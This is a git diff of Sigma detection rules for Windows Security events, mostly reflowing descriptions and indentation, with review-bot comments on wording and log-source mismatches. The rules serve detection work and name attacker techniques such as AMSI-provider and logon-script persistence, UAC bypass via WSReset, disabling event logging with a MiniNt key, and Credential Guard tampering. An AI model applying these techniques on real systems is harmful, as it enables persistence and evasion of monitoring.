a/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml b/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml index 0587814d1..07a57924f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml 
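Review bot: The reflowed `description:` still carries a wording error, "which is not longer supported", which should read "which is no longer supported". Since this commit already rewrites the line, it is the natural place to fix it: `description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab files using the "/extract" argument, which is no longer supported. This could indicate an attacker using an old technique`.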
@@ -1,8 +1,7 @@ title: Wusa.EXE Extracting Cab Files From Suspicious Paths id: c74c0390-3e20-41fd-a69a-128f0275a5ea status: test -description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) - utility to extract cab using the "/extract" argument from suspicious paths +description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://www.echotrail.io/insights/search/wusa.exe/ @@ -19,14 +18,16 @@ detection: EventID: 4688 Channel: Security selection_root: - CommandLine|contains: '/extract:' - NewProcessName|endswith: \wusa.exe + CommandLine|contains: '/extract:' + NewProcessName|endswith: \wusa.exe selection_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Users\Public\ - :\Windows\Temp\ - \Appdata\Local\Temp\ + # - '\Desktop\' + # - '\Downloads\' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml b/sigma/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml index f62ade2dc..96ed73a55 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml 
@@ -1,10 +1,8 @@ title: Wusa.EXE Executed By Parent Process Located In Suspicious Location id: ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99 status: experimental -description: 'Detects execution of the "wusa.exe" (Windows Update Standalone Installer) - utility by a parent process that is located in a suspicious location. - - ' +description: | + Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. references: - https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document author: X__Junior (Nextron Systems) @@ -19,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \wusa.exe + NewProcessName|endswith: \wusa.exe selection_paths_1: ParentProcessName|contains: - :\Perflogs\ @@ -28,18 +26,18 @@ detection: - \Appdata\Local\Temp\ - \Temporary Internet selection_paths_2: - - ParentProcessName|contains|all: - - :\Users\ - - \Favorites\ - - ParentProcessName|contains|all: - - :\Users\ - - \Favourites\ - - ParentProcessName|contains|all: - - :\Users\ - - \Contacts\ - - ParentProcessName|contains|all: - - :\Users\ - - \Pictures\ + - ParentProcessName|contains|all: + - :\Users\ + - \Favorites\ + - ParentProcessName|contains|all: + - :\Users\ + - \Favourites\ + - ParentProcessName|contains|all: + - :\Users\ + - \Contacts\ + - ParentProcessName|contains|all: + - :\Users\ + - \Pictures\ condition: process_creation and (selection_img and 1 of selection_paths_*) falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_add/registry_add_malware_netwire.yml b/sigma/builtin/registry/registry_add/registry_add_malware_netwire.yml index 154092c36..e8f66d225 100644 --- a/sigma/builtin/registry/registry_add/registry_add_malware_netwire.yml +++ b/sigma/builtin/registry/registry_add/registry_add_malware_netwire.yml 
@@ -22,7 +22,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: \software\NetWire condition: registry_add and selection falsepositives: diff --git a/sigma/builtin/registry/registry_add/registry_add_malware_ursnif.yml b/sigma/builtin/registry/registry_add/registry_add_malware_ursnif.yml index 141fc1074..148a9a35b 100644 --- a/sigma/builtin/registry/registry_add/registry_add_malware_ursnif.yml +++ b/sigma/builtin/registry/registry_add/registry_add_malware_ursnif.yml @@ -19,7 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: \Software\AppDataLow\Software\Microsoft\ filter: ObjectName|contains: diff --git a/sigma/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml b/sigma/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml index 9b7479be9..06f5ad620 100644 --- a/sigma/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml +++ b/sigma/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via New AMSI Providers - Registry id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 status: test -description: Detects when an attacker registers a new AMSI provider in order to achieve - persistence +description: Detects when an attacker registers a new AMSI provider in order to achieve persistence references: - https://persistence-info.github.io/Data/amsi.html - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c @@ -19,7 +18,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: - \SOFTWARE\Microsoft\AMSI\Providers\ - \SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\ 
@@ -30,7 +29,6 @@ detection: - C:\Program Files (x86)\ condition: registry_add and (selection and not filter) falsepositives: - - Legitimate security products adding their own AMSI providers. Filter these according - to your environment + - Legitimate security products adding their own AMSI providers. Filter these according to your environment level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml b/sigma/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml index 1d757f759..61e42dc5c 100644 --- a/sigma/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml +++ b/sigma/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml @@ -18,12 +18,14 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains|all: - \REGISTRY\USER\ - Classes\CLSID\ - \TreatAs filter_svchost: + # Example of target object by svchost + # TargetObject: HKU\S-1-5-21-1098798288-3663759343-897484398-1001_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs ProcessName: C:\WINDOWS\system32\svchost.exe condition: registry_add and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml b/sigma/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml index cc9f52ef1..aa1f84d9e 100644 --- a/sigma/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml +++ b/sigma/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml 
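Review bot: The example added under `filter_svchost` in registry_add_persistence_com_key_linking.yml is written in Sysmon terms (`TargetObject:` with an `HKU\...` path), whereas this rule matches Security event 4657 through `ObjectName|contains|all` with the `\REGISTRY\USER\` prefix, so the comment does not show what the filter actually compares against. Suggest rewording it in this rule's own field and path form, with placeholders, e.g. `# Example ObjectName written by svchost (presumably): \REGISTRY\USER\<SID>_Classes\CLSID\{<CLSID>}\TreatAs`. Keeping the Sysmon example risks a maintainer tuning the filter against a value shape that never occurs in this log source.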
@@ -1,16 +1,13 @@ title: Potential Persistence Via Disk Cleanup Handler - Registry id: d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a status: test -description: "Detects when an attacker modifies values of the Disk Cleanup Handler\ - \ in the registry to achieve persistence.\nThe disk cleanup manager is part of\ - \ the operating system. It displays the dialog box [\u2026]\nThe user has the\ - \ option of enabling or disabling individual handlers by selecting or clearing\ - \ their check box in the disk cleanup manager's UI.\nAlthough Windows comes with\ - \ a number of disk cleanup handlers, they aren't designed to handle files produced\ - \ by other applications.\nInstead, the disk cleanup manager is designed to be\ - \ flexible and extensible by enabling any developer to implement and register\ - \ their own disk cleanup handler.\nAny developer can extend the available disk\ - \ cleanup services by implementing and registering a disk cleanup handler.\n" +description: | + Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. + The disk cleanup manager is part of the operating system. It displays the dialog box […] + The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. + Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. + Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. + Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ 
@@ -27,9 +24,10 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\ filter: + # Default Keys ObjectName|endswith: - \Active Setup Temp Folders - \BranchCache diff --git a/sigma/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml b/sigma/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml index 060698ac6..d70431a44 100644 --- a/sigma/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml +++ b/sigma/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Logon Scripts - Registry id: 9ace0707-b560-49b8-b6ca-5148b42f39fb status: test -description: Detects creation of "UserInitMprLogonScript" registry value which can - be used as a persistence method by malicious actors +description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md author: Tom Ueltschi (@c_APT_ure) @@ -20,11 +19,10 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: UserInitMprLogonScript condition: registry_add and selection falsepositives: - - Investigate the contents of the "UserInitMprLogonScript" value to determine - of the added script is legitimate + - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate level: medium ruletype: Sigma 
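Review bot: The reflowed `falsepositives` entry in registry_add_persistence_logon_scripts_userinitmprlogonscript.yml keeps the wording error "to determine of the added script is legitimate"; it should read `- Investigate the contents of the "UserInitMprLogonScript" value to determine whether the added script is legitimate`. Since the line is already being rewritten by this commit, the fix costs nothing here.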
diff --git a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml index 4ec0bfa46..6b7bf6050 100644 --- a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml +++ b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml @@ -1,8 +1,7 @@ title: PUA - Sysinternal Tool Execution - Registry id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 status: test -description: Detects the execution of a Sysinternals Tool via the creation of the - "accepteula" registry key +description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis @@ -19,7 +18,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|endswith: \EulaAccepted condition: registry_add and selection falsepositives: diff --git a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml index f8ab5c87f..eb5eb7916 100644 --- a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml +++ b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml 
@@ -1,14 +1,12 @@ title: Suspicious Execution Of Renamed Sysinternals Tools - Registry id: f50f3c09-557d-492d-81db-9064a8d4e211 related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: 8023f872-3f1d-4301-a384-801889917ab4 - type: similar + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: 8023f872-3f1d-4301-a384-801889917ab4 + type: similar status: test -description: Detects the creation of the "accepteula" key related to the Sysinternals - tools being created from executables with the wrong name (e.g. a renamed Sysinternals - tool) +description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -25,7 +23,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: - \Active Directory Explorer - \Handle @@ -42,6 +40,7 @@ detection: ObjectName|endswith: \EulaAccepted filter: ProcessName|endswith: + # Please add new values while respecting the alphabetical order - \ADExplorer.exe - \ADExplorer64.exe - \handle.exe diff --git a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml index 72a452280..e385fd600 100644 --- a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml +++ b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml 
@@ -1,14 +1,12 @@ title: PUA - Sysinternals Tools Execution - Registry id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: 9841b233-8df8-4ad7-9133-b0b4402a9014 - type: obsoletes + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: 9841b233-8df8-4ad7-9133-b0b4402a9014 + type: obsoletes status: test -description: Detects the execution of some potentially unwanted tools such as PsExec, - Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" - registry key. +description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Nasreddine Bencherchali (Nextron Systems) @@ -25,7 +23,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: - \Active Directory Explorer - \Handle @@ -40,7 +38,6 @@ detection: ObjectName|endswith: \EulaAccepted condition: registry_add and selection falsepositives: - - Legitimate use of SysInternals tools. Filter the legitimate paths used in your - environment + - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml b/sigma/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml index e042cfe1e..90bdcf1e2 100644 --- a/sigma/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml +++ b/sigma/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml 
@@ -1,19 +1,17 @@ title: OilRig APT Registry Persistence id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 related: - - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 - type: similar - - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 - type: similar - - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 - type: similar + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar status: test -description: Detects OilRig registry persistence as reported by Nyotron in their March - 2018 report +description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report references: - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2023/03/08 tags: diff --git a/sigma/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml b/sigma/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml index b16177704..f216e7942 100644 --- a/sigma/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml +++ b/sigma/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml 
@@ -1,9 +1,7 @@ title: UAC Bypass Via Wsreset id: 6ea3bf32-9680-422d-9f50-e90716b12a66 status: test -description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated - with the Windows Store. It will run a binary file contained in a low-privilege - registry. +description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. references: - https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly - https://lolbas-project.github.io/lolbas/Binaries/Wsreset diff --git a/sigma/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml b/sigma/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml index a2629b922..d40cd36f9 100644 --- a/sigma/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml +++ b/sigma/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml @@ -1,8 +1,7 @@ title: CMSTP Execution Registry Event id: b6d235fc-1d38-4b12-adbe-325f06728f37 status: stable -description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution +description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman diff --git a/sigma/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml b/sigma/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml index b9247639b..67733d33e 100644 --- a/sigma/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml 
+++ b/sigma/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml @@ -1,8 +1,7 @@ title: Disable Security Events Logging Adding Reg Key MiniNt id: 919f2ef0-be2d-4a7a-b635-eb2b41fde044 status: test -description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, - Windows Event Log service will stopped write events. +description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events. references: - https://twitter.com/0gtweet/status/1182516740955226112 author: Ilyas Ochkov, oscd.community @@ -20,9 +19,10 @@ detection: EventID: 4657 Channel: Security selection: - - ObjectName: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt - OperationType: '%%1904' - - NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt + # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one + - ObjectName: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt + OperationType: '%%1904' + - NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt condition: registry_event and selection fields: - ProcessName diff --git a/sigma/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml b/sigma/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml index e1e5803d2..6dfcf5676 100644 --- a/sigma/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml +++ b/sigma/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml 
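Review bot: The reflowed `description:` of the MiniNt rule still reads "Windows Event Log service will stopped write events", which is ungrammatical; suggest `description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events.` The line is rewritten by this commit anyway, so the correction belongs here.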
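Review bot: The comment added above the `selection` list, `# Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one`, refers to Sysmon, but this rule keys on `EventID: 4657` / `Channel: Security` and its first alternative uses the 4657-style `ObjectName: \REGISTRY\MACHINE\...` form. The second alternative, `- NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt`, uses the `HKLM\` prefix, which looks like the Sysmon path form; it is worth confirming that Security 4657 events expose a `NewName` field in that format, because otherwise that branch can never match and only the `ObjectName` branch is effective. If it is a carry-over from the Sysmon rule, either drop it or reword the comment to say which log source each alternative is meant for.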
@@ -1,15 +1,10 @@ title: Wdigest CredGuard Registry Modification id: 1a2d6c47-75b0-45bd-b133-2c0be75349fd status: test -description: 'Detects potential malicious modification of the property value of IsCredGuardEnabled - from - - HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred - Guard on a system. - +description: | + Detects potential malicious modification of the property value of IsCredGuardEnabled from + HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials. - - ' references: - https://teamhydra.blog/2020/08/25/bypassing-credential-guard/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml b/sigma/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml index 742106968..b560eb428 100644 --- a/sigma/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml +++ b/sigma/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml 
@@ -1,9 +1,7 @@ title: Esentutl Volume Shadow Copy Service Keys id: 5aad0995-46ab-41bd-a9ff-724f41114971 status: test -description: Detects the volume shadow copy service initialization and processing - via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume - are captured. +description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml b/sigma/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml index 3b02eb832..4af4d7a21 100644 --- a/sigma/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml +++ b/sigma/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml @@ -1,8 +1,7 @@ title: HybridConnectionManager Service Installation - Registry id: ac8866c7-ce44-46fd-8c17-b24acff96ca8 status: test -description: Detects the installation of the Azure Hybrid Connection Manager service - to allow remote code execution from Azure function. +description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. references: - https://twitter.com/Cyb3rWard0g/status/1381642789369286662 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) 
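Review bot: The reflowed `description:` of the esentutl VSS rule is a plain (unquoted) YAML scalar, so the doubled backslashes in `HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume` are not escape sequences and will appear literally in the rendered description. Since the line is rewritten here, use single backslashes: `description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.`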
@@ -21,7 +20,7 @@ detection:
 selection1:
 ObjectName|contains: \Services\HybridConnectionManager
 selection2:
- OperationType: '%%1905'
+ OperationType: '%%1905'
 NewValue|contains: Microsoft.HybridConnectionManager.Listener.exe
 condition: registry_event and (selection1 or selection2)
 falsepositives:
diff --git a/sigma/builtin/registry/registry_event/registry_event_mal_flowcloud.yml b/sigma/builtin/registry/registry_event/registry_event_mal_flowcloud.yml
index 46c39932f..406ae8a3e 100644
--- a/sigma/builtin/registry/registry_event/registry_event_mal_flowcloud.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_mal_flowcloud.yml
@@ -18,11 +18,11 @@ detection:
 EventID: 4657
 Channel: Security
 selection:
- - ObjectName:
- - \REGISTRY\MACHINE\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}
- - \REGISTRY\MACHINE\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}
- - \REGISTRY\MACHINE\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}
- - ObjectName|startswith: \REGISTRY\MACHINE\SYSTEM\Setup\PrintResponsor\
+ - ObjectName:
+ - \REGISTRY\MACHINE\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}
+ - \REGISTRY\MACHINE\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}
+ - \REGISTRY\MACHINE\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}
+ - ObjectName|startswith: \REGISTRY\MACHINE\SYSTEM\Setup\PrintResponsor\
 condition: registry_event and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml b/sigma/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml
index 3583ba2a4..331a1af9b 100644
--- a/sigma/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml
@@ -1,8 +1,7 @@
 title: Potential Qakbot Registry Activity
 id: 1c8e96cd-2bed-487d-9de0-b46c90cade56
 status: experimental
-description: Detects a registry key used by IceID in a campaign that distributes malicious
- OneNote files
+description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
 references:
 - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
 author: Hieu Tran
diff --git a/sigma/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml b/sigma/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml
index 938138593..056c3c8b9 100644
--- a/sigma/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml
@@ -1,8 +1,7 @@
 title: PrinterNightmare Mimikatz Driver Name
 id: ba6b9e43-1d45-4d3c-a504-1043a64c8469
 status: test
-description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited
- in CVE-2021-1675 and CVE-2021-34527
+description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
 references:
 - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760
 - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf
@@ -41,10 +40,8 @@ detection:
 - Gentil Kiwi
 - mimikatz printer
 - Kiwi Legit Printer
- condition: registry_event and (selection or selection_alt or (selection_print
- and selection_kiwi))
+ condition: registry_event and (selection or selection_alt or (selection_print and selection_kiwi))
 falsepositives:
- - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser
- printer (unlikely)
+ - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)
 level: critical
 ruletype: Sigma
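Review bot: The reflowed description in the Qakbot hunk still attributes the registry key to `IceID` while the title (and file name) say Qakbot, so one of the two identifiers is wrong, and the family named in the description is normally spelled IcedID. I cannot tell from the hunk which family the referenced Zscaler post ties this key to, so please check the source and align either the title or the description, e.g. `description: Detects a registry key used by Qakbot in a campaign that distributes malicious OneNote files`. The two PrinterNightmare hunks on the same line are pure reflow and raise nothing.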
diff --git a/sigma/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml b/sigma/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml
index da623649f..fc44959f1 100644
--- a/sigma/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml
@@ -1,8 +1,7 @@
 title: Path To Screensaver Binary Modified
 id: 67a6c006-3fbe-46a7-9074-2ba3b82c3000
 status: test
-description: Detects value modification of registry key containing path to binary
- used as screensaver.
+description: Detects value modification of registry key containing path to binary used as screensaver.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md
 - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
diff --git a/sigma/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml b/sigma/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml
index cdced3934..cfe8d0c5c 100644
--- a/sigma/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml
@@ -18,7 +18,7 @@ detection:
 EventID: 4657
 Channel: Security
 selection1:
- OperationType: '%%1906'
+ OperationType: '%%1906'
 ObjectName|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\DelegateExecute
 selection2:
 ObjectName|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\(Default)
diff --git a/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml b/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml
index 283da84fd..6c04190ec 100644
--- a/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml
